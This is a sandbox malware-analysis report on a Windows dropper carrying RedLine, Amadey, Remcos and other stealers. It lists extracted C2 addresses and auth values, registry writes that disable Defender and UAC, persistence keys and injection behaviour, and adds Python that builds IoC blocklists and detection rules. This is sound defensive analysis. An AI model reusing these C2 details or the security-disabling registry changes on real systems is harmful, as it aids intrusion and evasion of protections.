Analysis
  max time kernel: 151s
  max time network: 154s
  platform: windows10-2004_x64
  resource: win10v2004-20220901-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20220901-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 03-02-2023 10:55
  Static task: static1
  Behavioral task: behavioral1
    Sample: 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe
    Resource: win10v2004-20220901-en
General
  Target: 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe
  Size: 603KB
  MD5: 1d5c91e93d5daa882ea28c5e3c985018
  SHA1: 385c2c38d59c7b55a8d12bd99ad417de50dd7da3
  SHA256: 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45
  SHA512: 18c28534f06f4afbb6372c2873fda4fda6748a6d9dc0a02d277ea12c1b607b79c77c7d6631b078e82136c49ae9975997497b864c30f41a3db362039fb5013aa3
  SSDEEP: 12288:/nmWQGvhT0qfqcEtOTy9IRJqzHaIGBUTx2UhE/yq8PAx5BAQi:/m6vB0qfMOaWe7GGx2ojIx5B5i
Malware Config

Extracted: redline
  Botnet: redko
  C2: 62.204.41.170:4179
  auth_value: 9bcf7b0620ff067017d66b9a5d80b547

Extracted: amadey
  Version: 3.66
  C2: 193.233.20.4/t6r48nSa/index.php
  C2: 62.204.41.88/9vdVVVjsw/index.php

Extracted: redline
  Botnet: temposs6678
  C2: 82.115.223.9:15486
  auth_value: af399e6a2fe66f67025541cf71c64313

Extracted: redline
  Botnet: gonka
  C2: 62.204.41.170:4179
  auth_value: f017b1096da5cc257f8ca109051c5fbb

Extracted: redline
  Botnet: @REDLINEVIP Cloud (TG: @FATHEROFCARDERS)
  C2: 151.80.89.233:13553
  auth_value: fbee175162920530e6bf470c8003fa1a

Extracted: amadey
  Version: 3.65
  C2: 77.73.134.27/8bmdh3Slb2/index.php

Extracted: redline
  Botnet: bigdick
  C2: 185.254.37.212:80
  auth_value: 88290259fe8dc49da48b125d03e6788c

Extracted: redline
  C2: 85.31.44.66:17742
  auth_value: e9a89e5b72a729171b1655add99ee280

Extracted: redline
  Botnet: Inkida
  C2: 195.201.30.165:80
  auth_value: 29132c501e296827c0ca24c0850430ea

Extracted: remcos
  Botnet: Crypt
  C2: 185.225.73.67:1050
  audio_folder: 576ruythg6534trewf
  audio_path: %WinDir%
  audio_record_time: 5
  connect_delay: 0
  connect_interval: 1
  copy_file: 76y5trfed675ytg.exe
  copy_folder: kjhgfdc
  delete_file: true
  hide_file: true
  hide_keylog_file: true
  install_flag: true
  install_path: %AppData%
  keylog_crypt: false
  keylog_file: 654ytrf654trf654ytgref.dat
  keylog_flag: false
  keylog_folder: 67yrtg564tr6754yter
  mouse_option: false
  mutex: 89765y4tergfw6587ryute-80UMP1
  screenshot_crypt: false
  screenshot_flag: true
  screenshot_folder: 67y4htergf65trgewfd654tyrfg
  screenshot_path: %Temp%
  screenshot_time: 10
  startup_value: 6754ytr756ytr7654yretg8765uyt
  take_screenshot_option: true
  take_screenshot_time: 5
  take_screenshot_title: bank

Notes on the configs: the redko and gonka RedLine builds share the C2 62.204.41.170:4179, so they are one operator's infrastructure. With install_flag true the Remcos copy lands at %AppData%\kjhgfdc\76y5trfed675ytg.exe and is started through the Run value 6754ytr756ytr7654yretg8765uyt; both names reappear in the "Adds Run key" IoCs below, and 76y5trfed675ytg.exe is the process that later hollows iexplore.exe. take_screenshot_title = bank together with take_screenshot_option true enables Remcos' keyword-triggered screenshots (a capture whenever a window title contains "bank"), on top of the timed captures configured by screenshot_flag/screenshot_time.
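The extracted configs are the actionable output of this report. The Python below is an added example, not part of the sandbox report or of any of the malware families' own code: it normalises the flattened "Extracted / family / name / C2 / key, value" layout above into one IoC table (family, botnet tag or version, host, port, path, attributes), builds a deduplicated public-address blocklist and points out endpoints shared by more than one config. The input is a subset of the blocks above embedded verbatim; the field roles (a name or version line precedes the C2 lines, key/value pairs follow them) and the port-80 assumption for URL-style Amadey C2s are this example's assumptions.

```python
import ipaddress
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed input: a subset of the "Malware Config" blocks listed above, copied
# as the report prints them (only the "-" separator lines are dropped).
CONFIG_TEXT = """
Extracted
redline
redko
62.204.41.170:4179
auth_value
9bcf7b0620ff067017d66b9a5d80b547
Extracted
amadey
3.66
193.233.20.4/t6r48nSa/index.php
62.204.41.88/9vdVVVjsw/index.php
Extracted
redline
gonka
62.204.41.170:4179
auth_value
f017b1096da5cc257f8ca109051c5fbb
Extracted
redline
85.31.44.66:17742
auth_value
e9a89e5b72a729171b1655add99ee280
Extracted
remcos
Crypt
185.225.73.67:1050
install_path
%AppData%
copy_folder
kjhgfdc
copy_file
76y5trfed675ytg.exe
startup_value
6754ytr756ytr7654yretg8765uyt
take_screenshot_title
bank
"""

HOSTPORT = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})$")  # RedLine / Remcos C2
URL = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})(/\S*)$")            # Amadey panel URL


@dataclass
class Ioc:
    family: str
    tag: str            # botnet/campaign name or Amadey version; "" when the block has none
    host: str
    port: int           # 80 assumed for URL-style C2s that carry no explicit port
    path: str = ""
    attrs: dict = field(default_factory=dict)


def split_blocks(text):
    """Cut the flattened config text at every 'Extracted' marker."""
    blocks, cur = [], None
    for line in (l.strip() for l in text.splitlines()):
        if not line or line == "-":
            continue
        if line == "Extracted":
            cur = []
            blocks.append(cur)
        elif cur is not None:
            cur.append(line)
    return blocks


def block_to_iocs(lines):
    """One block -> one Ioc per C2 endpoint. Lines before the first endpoint are the
    name/version; lines after the endpoints are flat key/value pairs."""
    family, rest = lines[0], lines[1:]
    tag, endpoints, attrs, i = "", [], {}, 0
    while i < len(rest):
        line = rest[i]
        if (m := HOSTPORT.match(line)):
            endpoints.append((m.group(1), int(m.group(2)), ""))
        elif (m := URL.match(line)):
            endpoints.append((m.group(1), 80, m.group(2)))
        elif not endpoints:
            tag = line
        else:
            attrs[line] = rest[i + 1] if i + 1 < len(rest) else ""
            i += 1  # the value line is consumed together with its key
        i += 1
    return [Ioc(family, tag, h, p, path, attrs) for h, p, path in endpoints]


def extract_iocs(text=CONFIG_TEXT):
    return [ioc for block in split_blocks(text) for ioc in block_to_iocs(block)]


def blocklist(iocs):
    """Unique host:port pairs, public addresses only (configs sometimes carry RFC 1918 test C2s)."""
    return sorted({f"{i.host}:{i.port}" for i in iocs if ipaddress.ip_address(i.host).is_global})


def shared_infrastructure(iocs):
    """host:port -> {(family, tag)} for endpoints that more than one config points at."""
    seen = defaultdict(set)
    for i in iocs:
        seen[f"{i.host}:{i.port}"].add((i.family, i.tag))
    return {k: v for k, v in seen.items() if len(v) > 1}


if __name__ == "__main__":
    iocs = extract_iocs()
    for i in iocs:
        print(f"{i.family:8} {i.tag:12} {i.host}:{i.port}{i.path}")
    print("blocklist:", blocklist(iocs))
    print("shared:", shared_infrastructure(iocs))
```

Feed the full config section in place of CONFIG_TEXT to get all eleven blocks; the attrs dictionary keeps the per-family extras (RedLine auth_value, the Remcos install and screenshot settings) so they stay attached to the C2 they belong to rather than being flattened away.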
Signatures

DcRat
  DarkCrystal (DC) is a .NET RAT active since June 2019, capable of loading additional plugins.

Detect rhadamanthys stealer shellcode (3 IoCs)
  YARA rule family_rhadamanthys matched (PID 4268 is cc.exe in the dropped-EXE list below):
    behavioral1/memory/4268-281-0x0000000000670000-0x000000000068D000-memory.dmp
    behavioral1/memory/3268-279-0x0000000001070000-0x000000000108D000-memory.dmp
    behavioral1/memory/4268-327-0x0000000000670000-0x000000000068D000-memory.dmp

Detects Smokeloader packer (1 IoC)
  YARA rule family_smokeloader matched (PID 4076 is the second meta5.exe instance, the SetThreadContext target of meta5.exe 1488):
    behavioral1/memory/4076-359-0x0000000000400000-0x0000000000409000-memory.dmp

Modifies Windows Defender Real-time Protection settings
  Processes: loda.exe, nika.exe
  Both write DWORD 1 to the following values under \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection (loda.exe also creates the key):
    loda.exe: DisableBehaviorMonitoring, DisableScanOnRealtimeEnable, DisableIOAVProtection, DisableOnAccessProtection, DisableRealtimeMonitoring
    nika.exe: DisableOnAccessProtection, DisableRealtimeMonitoring, DisableScanOnRealtimeEnable, DisableBehaviorMonitoring, DisableIOAVProtection

RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.

Rhadamanthys
  Rhadamanthys is an info stealer written in C++, first seen in August 2022.

SmokeLoader
  Modular backdoor trojan in use since 2014.

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  PID 4528 created 2464: process redline2.exe, target process taskhostw.exe. A process created with a parent other than its creator is consistent with the taskhostw.exe / fontview.exe branch appearing as a separate root in the process tree below.

UAC disabled through EnableLUA = 0 (signature title not present in the extraction; 3 IoCs)
  Processes: reg.exe, reg.exe, reg.exe
    Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0", once per reg.exe instance

WarzoneRat, AveMaria
  WarzoneRat is a native RAT developed in C++ with multiple plugins, sold as malware-as-a-service.

Blocklisted process makes network request (2 IoCs)
  flow 58: rundll32.exe (PID 4164)
  flow 59: rundll32.exe (PID 3852)

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 9 IoCs)
  Looks up the country code configured in the registry, likely used as a geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Control Panel\International\Geo\Nation
  by: mian.exe, lebro.exe, meta2.exe, nbveek.exe, dwn.exe, CBqrmoFax.exe, mnolyk.exe, nbveek.exe, NOTallowedtocrypt.exe

Executes dropped EXE (36 IoCs)
  PID and image: 4568 hook.exe, 2236 loda.exe, 1916 redko.exe, 944 aniam.exe, 4476 mian.exe, 1384 mnolyk.exe, 4164 ani.exe, 4992 nika.exe, 3264 repa.exe, 2224 lebro.exe, 4896 nbveek.exe, 3448 meta3.exe, 512 meta2.exe, 2208 nbveek.exe, 4528 redline2.exe, 4268 cc.exe, 480 redline1.exe, 4476 video.exe, 396 meta4.exe, 2648 redline4.exe, 1220 redline3.exe, 2684 mnolyk.exe, 1280 nbveek.exe, 2980 Aurora.exe, 1996 redline3.exe, 3676 Engine.exe, 4044 NOTallowedtocrypt.exe, 1488 meta5.exe, 308 76y5trfed675ytg.exe, 5032 dwn.exe, 4076 meta5.exe, 3252 CBqrmoFax.exe, 3288 ntlhost.exe, 1356 Russian.exe.pif, 3008 nbveek.exe, 4576 mnolyk.exe
  (PIDs are reused during the run: 4476 is listed for both mian.exe and video.exe.)

Loads dropped DLL (7 IoCs)
  4528 redline2.exe; rundll32.exe PIDs 3852, 3104, 3732, 5072, 5084, 3368

Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials.

UPX-packed file (signature title not present in the extraction; YARA rule upx)
  C:\Users\Admin\AppData\Local\Temp\SETUP_22269\Engine.exe (three matches)
  behavioral1/memory/3676-302-0x0000000000400000-0x0000000000558000-memory.dmp
  behavioral1/memory/3676-353-0x0000000000400000-0x0000000000558000-memory.dmp

Uses the VBS compiler for execution (1 TTPs)

Windows security modification
  Processes: loda.exe, nika.exe
    Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" (loda.exe)
    Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" (nika.exe)

Accesses Microsoft Outlook profiles (1 TTPs, 9 IoCs)
  All keys are under \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000:
  Key opened by rundll32.exe:
    Software\Microsoft\Office\12.0\Outlook\Profiles\Outlook
    Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
    Software\Microsoft\Office\10.0\Outlook\Profiles\Outlook
    Software\Microsoft\Office\11.0\Outlook\Profiles\Outlook
    Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
  Key opened by explorer.exe:
    Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 21 IoCs)
  HKLM below stands for \REGISTRY\MACHINE and HKU for \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000; the doubled backslashes of the report's string values are collapsed.
  Values written:
    Run\6754ytr756ytr7654yretg8765uyt = "C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe" (the Remcos startup_value and copy path), under HKU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run by iexplore.exe, 76y5trfed675ytg.exe and NOTallowedtocrypt.exe, and under HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run by the same three processes
    Run\NTSystem = C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe under HKU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, by video.exe
    Run\remcon = C:\Users\Admin\AppData\Local\Temp\dwn.exe under HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run, by dwn.exe
    Run\repa.exe = C:\Users\Admin\AppData\Local\Temp\1000015051\repa.exe under HKU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, by mnolyk.exe
    RunOnce\wextract_cleanup0 = rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\" under HKLM\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce, by 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe
    RunOnce\wextract_cleanup1 = rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\" under the same RunOnce key, by hook.exe and again by aniam.exe
  Keys created:
    HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce: hook.exe, 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe, aniam.exe
    HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\: NOTallowedtocrypt.exe, 76y5trfed675ytg.exe, iexplore.exe
    HKU\Software\Microsoft\Windows\CurrentVersion\Run\: 76y5trfed675ytg.exe, NOTallowedtocrypt.exe, iexplore.exe
  The wextract_cleanupN RunOnce entries and the IXP000.TMP / IXP001.TMP extraction folders are the footprint of IExpress (wextract) self-extracting packages, which is what the outer dropper stages are; they are clean-up commands rather than persistence.
Checks installed software on the system (1 TTPs)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
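The Defender policy writes, the EnableLUA = 0 writes, the Geo\Nation reads and the Run-key writes above are all registry events of the kind Sysmon (Event ID 12/13) or an EDR already produces. The Python below is an added example, not part of the report, that classifies such events into the behaviours this sample shows and extracts the persisted executable from Run-key command lines, including the unquoted-path-with-spaces case that naive splitting gets wrong. The input is a constructed feed built from rows in the IoC tables above (doubled backslashes collapsed) plus one benign Run value invented as a control; key paths are matched in the kernel \REGISTRY\MACHINE and \REGISTRY\USER\<SID> form the report uses, so a Sysmon feed would need HKLM/HKU mapped first.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class RegEvent:
    process: str
    op: str            # "set" (value written), "create" (key created) or "query" (value read)
    key: str           # kernel-style key path as the report prints it
    value: str = ""    # value name; "" for key-level operations
    data: str = ""     # data written, for "set" events


SID = r"\REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000"

# Constructed sample feed: rows taken from the IoC tables above (doubled backslashes
# collapsed), plus one benign Run value at the end invented here as a control.
EVENTS = [
    RegEvent("loda.exe", "set", r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableRealtimeMonitoring", "1"),
    RegEvent("nika.exe", "set", r"\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection", "DisableBehaviorMonitoring", "1"),
    RegEvent("loda.exe", "set", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features", "TamperProtection", "0"),
    RegEvent("reg.exe", "set", r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System", "EnableLUA", "0"),
    RegEvent("mian.exe", "query", SID + r"\Control Panel\International\Geo", "Nation"),
    RegEvent("video.exe", "set", SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "NTSystem",
             r"C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe"),
    RegEvent("NOTallowedtocrypt.exe", "set", r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run",
             "6754ytr756ytr7654yretg8765uyt", r'"C:\Users\Admin\AppData\Roaming\kjhgfdc\76y5trfed675ytg.exe"'),
    RegEvent("9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe", "set",
             r"\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce", "wextract_cleanup0",
             r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"'),
    RegEvent("explorer.exe", "set", SID + r"\SOFTWARE\Microsoft\Windows\CurrentVersion\Run", "OneDrive",
             r"C:\Program Files\Microsoft OneDrive\OneDrive.exe /background"),  # constructed benign control
]

RTP_KEY = re.compile(r"\\policies\\microsoft\\windows defender\\real-time protection$", re.I)
FEATURES_KEY = re.compile(r"\\microsoft\\windows defender\\features$", re.I)
UAC_KEY = re.compile(r"\\microsoft\\windows\\currentversion\\policies\\system$", re.I)
GEO_KEY = re.compile(r"\\control panel\\international\\geo$", re.I)
RUN_KEY = re.compile(r"\\microsoft\\windows\\currentversion\\run(once)?$", re.I)
USER_WRITABLE = re.compile(r"^[a-z]:\\users\\[^\\]+\\appdata\\", re.I)


def first_exe(cmd):
    """Executable path from a Run-key command line. A quoted path is taken verbatim; an
    unquoted one is cut after the first '.exe', so an unquoted path containing spaces
    (C:\\Program Files\\...) is not split at the space."""
    cmd = cmd.strip()
    if cmd.startswith('"'):
        return cmd[1:cmd.find('"', 1)]
    m = re.match(r"(.+?\.exe)(?:\s|$)", cmd, re.I)
    return m.group(1) if m else cmd.split(" ", 1)[0]


def classify(ev):
    """Map one registry event to the behaviour it evidences, or None."""
    key = ev.key.rstrip("\\")
    name = ev.value.lower()
    if ev.op == "set":
        if RTP_KEY.search(key) and name.startswith("disable") and ev.data == "1":
            return "defender_rtp_disabled"
        if FEATURES_KEY.search(key) and name == "tamperprotection" and ev.data == "0":
            return "defender_tamper_protection_off"
        if UAC_KEY.search(key) and name == "enablelua" and ev.data == "0":
            return "uac_disabled"
        if RUN_KEY.search(key):
            if name.startswith("wextract_cleanup"):
                return "runonce_iexpress_cleanup"  # IExpress/wextract tidy-up: fingerprints the dropper type
            if USER_WRITABLE.match(first_exe(ev.data)):
                return "run_persistence_user_writable"
            return "run_key_write"
    if ev.op == "query" and GEO_KEY.search(key) and name == "nation":
        return "geo_check"
    return None


def triage(events):
    """(category, process, detail) for every event that matches a rule, in feed order."""
    out = []
    for ev in events:
        cat = classify(ev)
        if cat is None:
            continue
        detail = first_exe(ev.data) if cat.startswith("run_") else f"{ev.value}={ev.data}".rstrip("=")
        out.append((cat, ev.process, detail))
    return out


def persisted_paths(events):
    """Executables persisted from user-writable locations, for collection or blocking."""
    return {first_exe(ev.data) for ev in events if classify(ev) == "run_persistence_user_writable"}


if __name__ == "__main__":
    for row in triage(EVENTS):
        print(*row, sep="\t")
    print("persisted:", sorted(persisted_paths(EVENTS)))
```

The Defender rules deliberately require the written data as well as the value name: a script that resets DisableRealtimeMonitoring to 0 touches the same key and should not fire. A Run value pointing into Program Files is reported as a plain run_key_write so that the OneDrive-style entries every workstation carries do not drown the two AppData entries this sample creates.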
Drops desktop.ini file(s) (1 IoC)
  svchost.exe: File opened for modification C:\Users\Admin\Videos\Captures\desktop.ini

Legitimate hosting services abused for malware hosting/C2 (1 TTPs)

Looks up external IP address via web service (1 IoC)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow 40: api.ipify.org

Suspicious use of SetThreadContext (8 IoCs)
  Source PID and image, target PID and image:
    4528 redline2.exe set thread context of 3404 ngentask.exe
    396 meta4.exe set thread context of 3816 vbc.exe
    2648 redline4.exe set thread context of 2308 vbc.exe
    1220 redline3.exe set thread context of 1996 redline3.exe
    2980 Aurora.exe set thread context of 4164 rundll32.exe
    308 76y5trfed675ytg.exe set thread context of 3564 iexplore.exe
    3564 iexplore.exe set thread context of 1392 svchost.exe
    1488 meta5.exe set thread context of 4076 meta5.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; nothing else in this report points to ransomware, and stealers enumerate drives as well.

Program crash (11 IoCs)
  WerFault.exe PID, crashed target PID and image:
    4632: 3036 9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe
    4652: 396 meta4.exe
    3156: 2648 redline4.exe
    1392: 4528 redline2.exe
    4588: 4528 redline2.exe
    4824: 4268 cc.exe
    692: 3852 rundll32.exe
    1772: 3732 rundll32.exe
    5004: 3368 rundll32.exe
    4656: 1356 Russian.exe.pif
    2792: 1356 Russian.exe.pif

Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
  SCSI information is often read in order to detect sandboxing environments.
  meta5.exe: Key opened, Key queried and Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI

Checks processor information in registry (2 TTPs, 58 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  All keys are under \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor (the svchost.exe rows print it as \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor). Grouped by process:
    Aurora.exe (27 rows): Key opened CentralProcessor, \0 and \1; Key enumerated CentralProcessor; Key value enumerated \0 and \1; Key value queried under \0: ~MHz, Component Information, Configuration Data, FeatureSet, Identifier, Platform Specific Field 1, Previous Update Revision, ProcessorNameString, Update Revision, Update Status, VendorIdentifier; under \1: the same set without ProcessorNameString.
    rundll32.exe, two instances (27 rows): Key opened CentralProcessor, \0 (twice) and \1; Key enumerated CentralProcessor; Key value enumerated \0 and \1; Key value queried under \0: Component Information, FeatureSet, Identifier, Platform Specific Field 1, Previous Update Revision, ProcessorNameString (twice), Update Revision, Update Status, VendorIdentifier; under \1: ~MHz, Component Information, Configuration Data, Identifier, Platform Specific Field 1, Previous Update Revision, ProcessorNameString, Update Revision, Update Status, VendorIdentifier.
    svchost.exe, two instances (4 rows): Key opened \0 (twice); Key value queried \0\ProcessorNameString (twice).

Creates scheduled task(s) (1 TTPs, 3 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  schtasks.exe PIDs 2000, 5072, 4588

GoLang User-Agent (1 IoC)
  Uses the default User-Agent string set by the Go HTTP packages.
  flow 87: HTTP User-Agent header Go-http-client/1.1

Modifies registry class (4 IoCs)
  NOTallowedtocrypt.exe: Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\
  rundll32.exe: Key created \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000_Classes\Local Settings
  svchost.exe: Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{12C7EA37-D772-46B5-8330-CB45E3A2CBA7}
  svchost.exe: Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-929662420-1054238289-2961194603-1000\{8BC83914-874A-4B88-8AD1-0473AE221BD7}

Modifies registry key (1 TTPs, 3 IoCs)

NTFS ADS (3 IoCs)
  dwn.exe: File created C:\Users\Admin\AppData\Local\Temp\16de06bfb4\programs.bat:start
  dwn.exe: File created C:\Users\Admin\Documents\Documents:ApplicationData
  dwn.exe: File opened for modification C:\Users\Admin\Documents\Documents:ApplicationData

Runs ping.exe (1 TTPs, 1 IoC)

Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Rows per process: loda.exe (2236) 2, redko.exe (1916) 2, nika.exe (4992) 2, ani.exe (4164) 1, repa.exe (3264) 2, redline2.exe (4528) 46, rundll32.exe (4164) 3, meta3.exe (3448) 2, rundll32.exe (3852) 2, vbc.exe (2308) 2

Suspicious behavior: MapViewOfSection (25 IoCs)
  Rows per process: 76y5trfed675ytg.exe (308) 1, iexplore.exe (3564) 1, meta5.exe (4076) 1, PID 2756 (image name not recorded in the report) 18, explorer.exe (640) 2, explorer.exe (4328) 2

Suspicious use of AdjustPrivilegeToken (42 IoCs)
  SeDebugPrivilege: loda.exe (2236), redko.exe (1916), nika.exe (4992), ani.exe (4164), repa.exe (3264), meta3.exe (3448), vbc.exe (3816), vbc.exe (2308), redline3.exe (1996), powershell.exe (3432), powershell.exe (4564), powershell.exe (3008), CBqrmoFax.exe (3252), powershell.exe (2452)
  AUDIODG.EXE (3076): Token 33, SeIncBasePriorityPrivilege
  PID 2756 (image name not recorded in the report): SeShutdownPrivilege and SeCreatePagefilePrivilege, 13 pairs

Suspicious use of FindShellTrayWindow (8 IoCs)
  rundll32.exe (4164) 1, Russian.exe.pif (1356) 3, PID 2756 4

Suspicious use of SendNotifyMessage (3 IoCs)
  Russian.exe.pif (1356) 3

Suspicious use of SetWindowsHookEx (2 IoCs)
  OpenWith.exe (1956), iexplore.exe (3564)

Suspicious use of WriteProcessMemory (64 IoCs)
  Parent (PID) wrote to memory of child (PID); the sandbox logs one row per write, so the count of identical rows is given:
    9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe (3036) -> hook.exe (4568), 3
    hook.exe (4568) -> loda.exe (2236), 2
    hook.exe (4568) -> redko.exe (1916), 3
    9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe (3036) -> aniam.exe (944), 3
    aniam.exe (944) -> mian.exe (4476), 3
    mian.exe (4476) -> mnolyk.exe (1384), 3
    aniam.exe (944) -> ani.exe (4164), 3
    mnolyk.exe (1384) -> schtasks.exe (2000), 3
    mnolyk.exe (1384) -> cmd.exe (1188), 3
    cmd.exe (1188) -> cmd.exe (1448), 3
    cmd.exe (1188) -> cacls.exe (3736), 3
    cmd.exe (1188) -> cacls.exe (4236), 3
    cmd.exe (1188) -> cmd.exe (1060), 3
    cmd.exe (1188) -> cacls.exe (2080), 3
    cmd.exe (1188) -> cacls.exe (5020), 3
    mnolyk.exe (1384) -> nika.exe (4992), 2
    mnolyk.exe (1384) -> repa.exe (3264), 3
    mnolyk.exe (1384) -> lebro.exe (2224), 3
    lebro.exe (2224) -> nbveek.exe (4896), 3
    nbveek.exe (4896) -> schtasks.exe (5072), 3
    nbveek.exe (4896) -> cmd.exe (5004), 3
    cmd.exe (5004) -> cmd.exe (1268), 3
outlook_office_path 1 IoCs
Processes:
explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
-
outlook_win_path 1 IoCs
Processes:
explorer.exe: Key opened \REGISTRY\USER\S-1-5-21-929662420-1054238289-2961194603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes
-
C:\Windows\system32\taskhostw.exe  (level 1)  cmdline: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
-
C:\Windows\SysWOW64\fontview.exe  (level 2)  cmdline: "C:\Windows\SYSWOW64\fontview.exe"
-
C:\Users\Admin\AppData\Local\Temp\9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe  (level 1)  cmdline: "C:\Users\Admin\AppData\Local\Temp\9ac4be38637f17483f3b54a09a1a5af0e753b394546621337c7dd1d3613f9b45.exe"
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hook.exe  (level 2)  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\hook.exe
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\loda.exe  (level 3)  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\loda.exe
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\redko.exe  (level 3)  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\redko.exe
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\aniam.exe  (level 2)  cmdline: C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\aniam.exe
- Executes dropped EXE
- Adds Run key to start application
